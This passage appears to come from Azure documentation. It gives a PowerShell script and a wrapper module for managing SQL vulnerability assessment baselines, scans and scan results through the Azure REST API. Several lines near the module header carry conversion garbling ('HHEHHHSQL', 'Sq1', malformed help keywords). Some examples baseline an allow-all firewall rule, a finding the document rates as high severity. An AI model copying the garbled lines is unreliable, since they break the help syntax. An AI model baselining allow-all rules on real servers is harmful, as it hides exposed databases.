the server and sets the latest scan results as a baseline.
#>

$SubscriptionId = "<subscriptionid>"        # The subscription id that the server belongs to.
$ResourceGroupName = "<resource group>"     # The resource group that the server belongs to.
$ServerName = "<server name>"               # The SQL server name that we want to apply the new SQL Vulnerability Assessment policy to (short name, without suffix).
$APIVersion = "2022-05-01-preview"

###### New SQL Vulnerability Assessment Commands ######
#######################################################

function GetExpressConfigurationStatus($SubscriptionId, $ResourceGroupName, $ServerName) {
    $Uri = "https://management.azure.com/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/Default?api-version=" + $APIVersion
    SendRestRequest -Method "GET" -Uri $Uri
}

function SetLastScanAsBaselineOnSystemDatabase($SubscriptionId, $ResourceGroupName, $ServerName) {
    $Uri = "https://management.azure.com/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baselines/default?systemDatabaseName=master&api-version=" + $APIVersion
    # latestScan = true tells the service to take the latest scan results as the baseline.
    $Body = '{"properties": {"latestScan": true, "results": {}}}'
    SendRestRequest -Method "PUT" -Uri $Uri -Body $Body
}

function SetLastScanAsBaselineOnUserDatabase($SubscriptionId, $ResourceGroupName, $ServerName, $DatabaseName) {
    $Uri = "https://management.azure.com/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/baselines/default?api-version=" + $APIVersion
    $Body = '{"properties": {"latestScan": true, "results": {}}}'
    SendRestRequest -Method "PUT" -Uri $Uri -Body $Body
}

function SendRestRequest(
    [Parameter(Mandatory = $True)]
    [string] $Method,
    [Parameter(Mandatory = $True)]
    [string] $Uri,
    [Parameter(Mandatory = $false)]
    [string] $Body = "DEFAULT") {

    # Use the signed-in Az context to obtain a bearer token for the ARM endpoint.
    $AccessToken = Get-AzAccessToken
    $Token = "Bearer $($AccessToken.Token)"

    $headers = @{
        'Authorization' = $Token
    }
    $Params = @{
        Method      = $Method
        Uri         = $Uri
        Headers     = $headers
        ContentType = "application/json"
    }
    if (!($Body -eq "DEFAULT")) {
        $Params.Body = $Body
    }

    Invoke-RestMethod @Params
}

#######################################################

# Connect
Connect-AzAccount
Set-AzContext -Subscription $SubscriptionId

# Check if Express Configuration is enabled
$ECState = (GetExpressConfigurationStatus -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName).properties.State

Write-Host "Express Configuration status: " $ECState

if ($ECState -eq "Enabled") {
    # Get list of databases
    $databases = Get-AzSqlDatabase -ResourceGroupName $ResourceGroupName -ServerName $ServerName | Where-Object { $_.DatabaseName -ne "master" }

    # Set latest scan results as baseline on all user databases
    foreach ($database in $databases) {
        Write-Host "Set baseline on database: '$($database.DatabaseName)'"
        SetLastScanAsBaselineOnUserDatabase -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName -DatabaseName $database.DatabaseName
    }

    Write-Host "Set baseline on 'master' database"
    SetLastScanAsBaselineOnSystemDatabase -SubscriptionId $SubscriptionId -ResourceGroupName $ResourceGroupName -ServerName $ServerName
}
else {
    Write-Host "The specified server does not have VA Express Configuration enabled, therefore bulk baseline operations were not performed."
    return
}

Next steps 


For more information on the Azure PowerShell module, see Azure PowerShell 
documentation. 


Express configuration PowerShell wrapper module 


Article · 06/05/2023 


This article contains the PowerShell wrapper for SQL vulnerability assessment express 
configuration. 


Make a local copy of the script and save the file with the file name 
SqlVulnerabilityAssessmentCommands.psm1. 


After you have made a local copy of the wrapper, use the Express 
configuration PowerShell commands reference. 


SqlVulnerabilityAssessmentCommands.psm1 


PowerShell 


#Requires -Modules @{ ModuleName="Az.Sql"; ModuleVersion="3.11.0" } 
#Requires -Modules @{ ModuleName="Az.Accounts"; ModuleVersion="2.9.1" } 
#Requires -Version 5.1 


HHEHHHSQL Vulnerability Assessment PowerShell Commands ###### 
JOTA TA AT AT ATTA ATO A 


###Sq1 Vulnerability Assessment Baseline#t## 


# Create Or Update 
function Set-SqlVulnerabilityAssessmentBaseline([parameter (mandatory) ] 
[string] $SubscriptionId, [parameter(mandatory)] [string] 
$ResourceGroupName, [parameter(mandatory)] [string] $ServerName, 
[parameter(mandatory)] [string] $DatabaseName, [parameter (mandatory) ] 
[string] $Body) { 
<# 
. SYNOPSIS 
Sets vulnerability assessment baselines on the database. 


. DESCRIPTION 
Sets vulnerability assessment baselines on the database. 


.PARAMETER SubscriptionId 
Subscription id. 


.PARAMETER ResourceGroupName 
Resource group name. 


-PARAMETER ServerName 
Server name. 


.PARAMETER DatabaseName 
Database name. 


. PARAMETER Body 
Baseline. 


. EXAMPLE 

Set-SqlVulnerabilityAssessmentBaseline -SubscriptionId 00000000- 
1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg 
        -ServerName vulnerabilityaseessmenttest -DatabaseName db -Body '{ "properties": { "latestScan": true, "results": {} } }'

        Headers    : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], [x-ms-ratelimit-remaining-subscription-writes, System.String[]], [x-ms-correlation-request-id, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : PUT
        Content    : {"properties":{"results":{"VA1143":[["True"]],"VA1219":[["False"]]}},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/Default","name":"Default","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}

    .EXAMPLE
        Set-SqlVulnerabilityAssessmentBaseline -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -Body '{
          "properties": {
            "latestScan": false,
            "results": {
              "VA2062": [
                [
                  "AllowAll",
                  "0.0.0.0",
                  "255.255.255.255"
                ]
              ]
            }
          }
        }'

        Headers    : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], [x-ms-ratelimit-remaining-subscription-writes, System.String[]], [x-ms-correlation-request-id, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : PUT
        Content    : {"properties":{"results":{"VA2062":[["AllowAll","0.0.0.0","255.255.255.255"]]}},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/Default","name":"Default","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}
    #>
    # The master database is addressed at server level with systemDatabaseName=master;
    # user databases go through the databases/{name} segment.
    if ($DatabaseName -eq 'master') {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview&systemDatabaseName=master"
    } else {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview"
    }

    return SendRestRequest -Method "Put" -Uri $Uri -Body $Body
}

# Get
function Get-SqlVulnerabilityAssessmentBaseline(
    [parameter(mandatory)] [string] $SubscriptionId,
    [parameter(mandatory)] [string] $ResourceGroupName,
    [parameter(mandatory)] [string] $ServerName,
    [parameter(mandatory)] [string] $DatabaseName) {
    <#
    .SYNOPSIS
        Gets vulnerability assessment baselines for the user database.

    .DESCRIPTION
        Gets vulnerability assessment baselines for the user database.

    .PARAMETER SubscriptionId
        Subscription id.

    .PARAMETER ResourceGroupName
        Resource group name.

    .PARAMETER ServerName
        Server name.

    .PARAMETER DatabaseName
        Database name.

    .EXAMPLE
        Get-SqlVulnerabilityAssessmentBaseline -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db

        Headers    : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], [x-ms-ratelimit-remaining-subscription-reads, System.String[]], [x-ms-correlation-request-id, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : GET
        Content    : {"properties":{"results":{"VA1143":[["True"]],"VA1219":[["False"]]}},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/Default","name":"Default","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}
    #>
    if ($DatabaseName -eq 'master') {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview&systemDatabaseName=master"
    } else {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/baselines/default?api-version=2022-02-01-preview"
    }

    return SendRestRequest -Method "Get" -Uri $Uri
}

###Database Sql Vulnerability Assessment Rule Baselines### 


# Create Or Update
function Set-SqlVulnerabilityAssessmentBaselineRule(
    [parameter(mandatory)] [string] $SubscriptionId,
    [parameter(mandatory)] [string] $ResourceGroupName,
    [parameter(mandatory)] [string] $ServerName,
    [parameter(mandatory)] [string] $DatabaseName,
    [parameter(mandatory)] [string] $RuleId,
    [parameter(mandatory)] [string] $Body) {
    <#
    .SYNOPSIS
        Sets vulnerability assessment baseline for a specific rule on the database.

    .DESCRIPTION
        Sets vulnerability assessment baseline for a specific rule on the database.

    .PARAMETER SubscriptionId
        Subscription id.

    .PARAMETER ResourceGroupName
        Resource group name.

    .PARAMETER ServerName
        Server name.

    .PARAMETER DatabaseName
        Database name.

    .PARAMETER RuleId
        Rule id.

    .PARAMETER Body
        Baseline.

    .EXAMPLE
        Set-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -RuleId VA2062 -Body '{
          "properties": {
            "latestScan": false,
            "results": [
              [
                "AllowAll",
                "0.0.0.0",
                "255.255.255.255"
              ]
            ]
          }
        }'

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : PUT
        Content    : {"properties":{"results":[["AllowAll","0.0.0.0","255.255.255.255"]]},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062","name":"VA2062","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}
    #>
    # The query string is concatenated rather than interpolated because "?" is a
    # legal variable-name character and "$RuleId?api-version" would not expand as intended.
    if ($DatabaseName -eq 'master') {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId" + "?api-version=2022-02-01-preview&systemDatabaseName=master"
    } else {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId" + "?api-version=2022-02-01-preview"
    }

    return SendRestRequest -Method "Put" -Uri $Uri -Body $Body
}
# Get
function Get-SqlVulnerabilityAssessmentBaselineRule(
    [parameter(mandatory)] [string] $SubscriptionId,
    [parameter(mandatory)] [string] $ResourceGroupName,
    [parameter(mandatory)] [string] $ServerName,
    [parameter(mandatory)] [string] $DatabaseName,
    [string] $RuleId) {
    <#
    .SYNOPSIS
        Gets vulnerability assessment baseline for a specific rule from the database.

    .DESCRIPTION
        Gets vulnerability assessment baseline for a specific rule from the database.
        When RuleId is omitted, all rule baselines of the database are returned as a list.

    .PARAMETER SubscriptionId
        Subscription id.

    .PARAMETER ResourceGroupName
        Resource group name.

    .PARAMETER ServerName
        Server name.

    .PARAMETER DatabaseName
        Database name.

    .PARAMETER RuleId
        Rule id.

    .EXAMPLE
        Get-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -RuleId VA2062

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : GET
        Content    : {"properties":{"results":[["AllowAll","0.0.0.0","255.255.255.255"]]},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062","name":"VA2062","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}

    .EXAMPLE
        Get-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : GET
        Content    : {"value":[
                     {"properties":{"results":[["True"]]},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA1143","name":"VA1143","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"},
                     {"properties":{"results":[["False"]]},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/migrationsql1/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA1219","name":"VA1219","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"},
                     {"properties":{"results":[["AllowAll","0.0.0.0","255.255.255.255"]]},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062","name":"VA2062","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"}]}
    #>
    if ($DatabaseName -eq 'master') {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId" + "?api-version=2022-02-01-preview&systemDatabaseName=master"
    } else {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId" + "?api-version=2022-02-01-preview"
    }

    return SendRestRequest -Method "Get" -Uri $Uri
}

# Remove
function Remove-SqlVulnerabilityAssessmentBaselineRule(
    [parameter(mandatory)] [string] $SubscriptionId,
    [parameter(mandatory)] [string] $ResourceGroupName,
    [parameter(mandatory)] [string] $ServerName,
    [parameter(mandatory)] [string] $DatabaseName,
    [parameter(mandatory)] [string] $RuleId) {
    <#
    .SYNOPSIS
        Deletes vulnerability assessment baseline for a specific rule from the database.

    .DESCRIPTION
        Deletes vulnerability assessment baseline for a specific rule from the database.

    .PARAMETER SubscriptionId
        Subscription id.

    .PARAMETER ResourceGroupName
        Resource group name.

    .PARAMETER ServerName
        Server name.

    .PARAMETER DatabaseName
        Database name.

    .PARAMETER RuleId
        Rule id.

    .EXAMPLE
        Remove-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -RuleId VA2062

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : DELETE
        Content    :
    #>
    if ($DatabaseName -eq 'master') {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId" + "?api-version=2022-02-01-preview&systemDatabaseName=master"
    } else {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/baselines/default/rules/$RuleId" + "?api-version=2022-02-01-preview"
    }

    return SendRestRequest -Method "Delete" -Uri $Uri
}

###Sql Vulnerability Assessment Scan Result### 


# Get
function Get-SqlVulnerabilityAssessmentScanResults(
    [parameter(mandatory)] [string] $SubscriptionId,
    [parameter(mandatory)] [string] $ResourceGroupName,
    [parameter(mandatory)] [string] $ServerName,
    [parameter(mandatory)] [string] $DatabaseName,
    [parameter(mandatory)] [string] $ScanId,
    [string] $RuleId) {
    <#
    .SYNOPSIS
        Gets vulnerability assessment scan results for a specific rule from the database.

    .DESCRIPTION
        Gets vulnerability assessment scan results for a specific rule from the database.
        When RuleId is omitted, the results of every rule in the scan are returned as a list.

    .PARAMETER SubscriptionId
        Subscription id.

    .PARAMETER ResourceGroupName
        Resource group name.

    .PARAMETER ServerName
        Server name.

    .PARAMETER DatabaseName
        Database name.

    .PARAMETER ScanId
        Scan id.

    .PARAMETER RuleId
        Rule id.

    .EXAMPLE
        Get-SqlVulnerabilityAssessmentScanResults -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -ScanId latest -RuleId VA2062

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : GET
        Content    : {"properties":{"ruleId":"VA2062","status":"NonFinding","errorMessage":null,"isTrimmed":false,"queryResults":[],
                     "remediation":{"description":"Remove database firewall rules that grant excessive access","scripts":[],"automated":false,"portalLink":""},
                     "baselineAdjustedResult":null,
                     "ruleMetadata":{"ruleId":"VA2062","severity":"High","category":"SurfaceAreaReduction","ruleType":"NegativeList",
                     "title":"Database-level firewall rules should not grant excessive access",
                     "description":"The Azure SQL Database-level firewall helps protect your data by preventing all access to your database until you specify which IP addresses have permission. Database-level firewall rules grant access to the specific database based on the originating IP address of each request.\n\nDatabase-level firewall rules for master and user databases can only be created and managed through Transact-SQL (unlike server-level firewall rules which can also be created and managed using the Azure portal or PowerShell). For more details please see: https://docs.microsoft.com/en-us/azure/sql-database/sql-database-firewall-configure\n\nThis check verifies that each database-level firewall rule does not grant access to more than 255 IP addresses.",
                     "rationale":"Often, administrators add rules that grant excessive access as part of a troubleshooting process - to eliminate the firewall as the source of a problem, they simply create a rule that allows all traffic to pass to the affected database.\n\nGranting excessive access using database firewall rules is a clear security concern, as it violates the principle of least privilege by allowing unnecessary access to your database. In fact, it's the equivalent of placing the database outside of the firewall.",
                     "queryCheck":{"query":"SELECT name AS [Firewall Rule Name]\n    ,start_ip_address AS [Start Address]\n    ,end_ip_address AS [End Address]\nFROM sys.database_firewall_rules\nWHERE ( \n    (CONVERT(bigint, parsename(end_ip_address, 1)) +\n    CONVERT(bigint, parsename(end_ip_address, 2)) * 256 + \n    CONVERT(bigint, parsename(end_ip_address, 3)) * 65536 + \n    CONVERT(bigint, parsename(end_ip_address, 4)) * 16777216 ) \n    - \n    (CONVERT(bigint, parsename(start_ip_address, 1)) +\n    CONVERT(bigint, parsename(start_ip_address, 2)) * 256 + \n    CONVERT(bigint, parsename(start_ip_address, 3)) * 65536 + \n    CONVERT(bigint, parsename(start_ip_address, 4)) * 16777216 ) \n    ) > 255","expectedResult":[],"columnNames":["Firewall Rule Name","Start Address","End Address"]},
                     "benchmarkReferences":[]}},
                     "id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/scans/VA2062/scanResults/VA2062","name":"VA2062","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResults"}

    .EXAMPLE
        Get-SqlVulnerabilityAssessmentScanResults -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -ScanId latest

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : GET
        Content    : {"value":[
                     {"properties":{"ruleId":"VA1219","status":"NonFinding","errorMessage":null,"isTrimmed":false,"queryResults":[["False"]],
                     "remediation":{"description":"Enable TDE on the affected databases","scripts":[],"automated":false,"portalLink":"EnableTDE"},
                     "baselineAdjustedResult":{"baseline":{"expectedResults":[["False"]],"updatedTime":"2023-05-15T08:52:39.3476874+00:00"},"status":"NonFinding","resultsNotInBaseline":[],"resultsOnlyInBaseline":[]},
                     "ruleMetadata":{"ruleId":"VA1219","severity":"Medium","category":"DataProtection","ruleType":"Binary",
                     "title":"Transparent data encryption should be enabled",
                     "description":"Transparent data encryption (TDE) helps to protect the database files against information disclosure by performing real-time encryption and decryption of the database, associated backups, and transaction log files 'at rest', without requiring changes to the application. This rule checks that TDE is enabled on the database.",
                     "rationale":"Transparent Data Encryption (TDE) protects data 'at rest', meaning the data and log files are encrypted when stored on disk.",
                     "queryCheck":{"query":"SELECT CASE\n    WHEN EXISTS (\n        SELECT *\n        FROM sys.databases\n        WHERE db_name(database_id) = db_name()\n        AND is_encrypted = 0\n    )\n    THEN 1\n    ELSE 0\n    END AS [Violation]","expectedResult":[["0"]],"columnNames":["Violation"]},
                     "benchmarkReferences":[{"benchmark":"FedRAMP","reference":null}]}},
                     "id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/scans/VA1219/scanResults/VA1219","name":"VA1219","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResults"},
                     {"properties":{"ruleId":"VA1223","status":"NonFinding","errorMessage":null,"isTrimmed":false,"queryResults":[],
                     "remediation":{"description":"Create new certificates, re-encrypt the data/sign-data using the new key, and drop the affected keys.","scripts":[],"automated":false,"portalLink":""},
                     "baselineAdjustedResult":null,
                     "ruleMetadata":{"ruleId":"VA1223","severity":"High","category":"DataProtection","ruleType":"NegativeList",
                     "title":"Certificate keys should use at least 2048 bits",
                     "description":"Certificate keys are used in RSA and other encryption algorithms to protect data. These keys need to be of enough length to secure the user's data. This rule checks that the key's length is at least 2048 bits for all certificates.",
                     "rationale":"Key length defines the upper-bound on the encryption algorithm's security. Using short keys in encryption algorithms may lead to weaknesses in data-at-rest protection.",
                     "queryCheck":{"query":"SELECT name AS [Certificate Name], thumbprint AS [Thumbprint]\nFROM sys.certificates\nWHERE key_length < 2048","expectedResult":[],"columnNames":["Certificate Name","Thumbprint"]},
                     "benchmarkReferences":[{"benchmark":"FedRAMP","reference":null}]}},
                     "id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/scans/VA1223/scanResults/VA1223","name":"VA1223","type":"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResults"}]}
    #>
    if ($DatabaseName -eq 'master') {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/scans/$ScanId/scanResults/$RuleId" + "?api-version=2022-02-01-preview&systemDatabaseName=master"
    } else {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/scans/$ScanId/scanResults/$RuleId" + "?api-version=2022-02-01-preview"
    }

    return SendRestRequest -Method "Get" -Uri $Uri
}

###Sql Vulnerability Assessment Scans### 


# Get
function Get-SqlVulnerabilityAssessmentScans(
    [parameter(mandatory)] [string] $SubscriptionId,
    [parameter(mandatory)] [string] $ResourceGroupName,
    [parameter(mandatory)] [string] $ServerName,
    [parameter(mandatory)] [string] $DatabaseName,
    [string] $ScanId) {
    <#
    .SYNOPSIS
        Gets vulnerability assessment scan summary from the database.

    .DESCRIPTION
        Gets vulnerability assessment scan summary from the database.
        When ScanId is omitted, the summaries of all scans are returned as a list.

    .PARAMETER SubscriptionId
        Subscription id.

    .PARAMETER ResourceGroupName
        Resource group name.

    .PARAMETER ServerName
        Server name.

    .PARAMETER DatabaseName
        Database name.

    .PARAMETER ScanId
        Scan id.

    .EXAMPLE
        Get-SqlVulnerabilityAssessmentScans -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db -ScanId latest

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : GET
        Content    : {"properties":{"scanId":"f64d81a1-9d7b-4516-a623-a1bfc845ed7e","triggerType":"OnDemand","state":"Passed","startTime":"2023-04-17T12:52:41.4142209Z","endTime":"2023-04-17T12:52:41.5235755Z","server":"vulnerabilityaseessmenttest","database":"db","sqlVersion":"16.0.5100","highSeverityFailedRulesCount":0,"mediumSeverityFailedRulesCount":0,"lowSeverityFailedRulesCount":0,"totalPassedRulesCount":24,"totalFailedRulesCount":0,"totalRulesCount":24,"isBaselineApplied":true},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/migrationscripttests/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/vulnerabilityAssessments/Default/scans/f64d81a1-9d7b-4516-a623-a1bfc845ed7e","name":"f64d81a1-9d7b-4516-a623-a1bfc845ed7e","type":"Microsoft.Sql/servers/databases/vulnerabilityAssessments/scans"}

    .EXAMPLE
        Get-SqlVulnerabilityAssessmentScans -SubscriptionId 00000000-1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -DatabaseName db

        Headers    : {[Cache-Control, System.String[]], [Pragma, System.String[]], [x-ms-request-id, System.String[]], [Server, System.String[]]...}
        Version    : 1.1
        StatusCode : 200
        Method     : GET
        Content    : {"value":[{"properties":{"scanId":"f64d81a1-9d7b-4516-a623-a1bfc845ed7e","triggerType":"OnDemand","state":"Passed","startTime":"2023-04-17T12:52:41.4142209Z","endTime":"2023-04-17T12:52:41.5235755Z","server":"vulnerabilityaseessmenttest","database":"db","sqlVersion":"16.0.5100","highSeverityFailedRulesCount":0,"mediumSeverityFailedRulesCount":0,"lowSeverityFailedRulesCount":0,"totalPassedRulesCount":24,"totalFailedRulesCount":0,"totalRulesCount":24,"isBaselineApplied":true},"id":"/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/vulnerabilityAssessments/Default/scans/f64d81a1-9d7b-4516-a623-a1bfc845ed7e","name":"f64d81a1-9d7b-4516-a623-a1bfc845ed7e","type":"Microsoft.Sql/servers/databases/vulnerabilityAssessments/scans"}]}
    #>
    if ($DatabaseName -eq 'master') {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/scans/$ScanId" + "?api-version=2022-02-01-preview&systemDatabaseName=master"
    } else {
        $Uri = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAssessments/default/scans/$ScanId" + "?api-version=2022-02-01-preview"
    }

    return SendRestRequest -Method "Get" -Uri $Uri
}


###Sql Vulnerability Assessment Execute Scan### 


# Invoke
function Invoke-SqlVulnerabilityAssessmentScan(
    [parameter(mandatory)] [string] $SubscriptionId,
    [parameter(mandatory)] [string] $ResourceGroupName,
    [parameter(mandatory)] [string] $ServerName,
    [parameter(mandatory)] [string] $DatabaseName) {
    <#
    .SYNOPSIS
        Runs vulnerability assessment scan on the database.

    .DESCRIPTION
        Runs vulnerability assessment scan on the database. The call is accepted
        asynchronously (HTTP 202); the Location and Retry-After headers point at the
        operation to poll.

    .PARAMETER SubscriptionId
        Subscription id.

    .PARAMETER ResourceGroupName
        Resource group name.

    .PARAMETER ServerName
        Server name.

    .PARAMETER DatabaseName
        Database name.

    .EXAMPLE
